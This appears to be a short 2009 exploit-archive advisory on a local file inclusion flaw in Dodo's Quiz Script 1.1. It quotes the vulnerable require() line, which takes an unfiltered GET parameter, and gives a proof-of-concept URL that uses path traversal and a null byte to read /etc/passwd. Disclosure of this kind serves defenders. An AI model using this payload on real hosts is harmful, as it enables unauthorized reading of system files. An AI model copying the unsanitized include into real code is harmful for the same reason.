Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability

2009-01-20 20:01:46


Discovered by cOndemned
Greetz: str0ke, sid.psycho & TWT, Alfons Luja

Download : http://regretless.com/scripts/dodosdownload.php?action=download&n=1


source of dodosquiz.php:

[ ... ]

25. if(!$_GET['n'])

26. exit;

27. require("quiz_".$_GET['n'].".php"); # lfi

[ ... ]


proof of concept:

http://[host]/[dodos_quiz_path]/dodosquiz.php?n=/../../../../etc/passwd%00

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.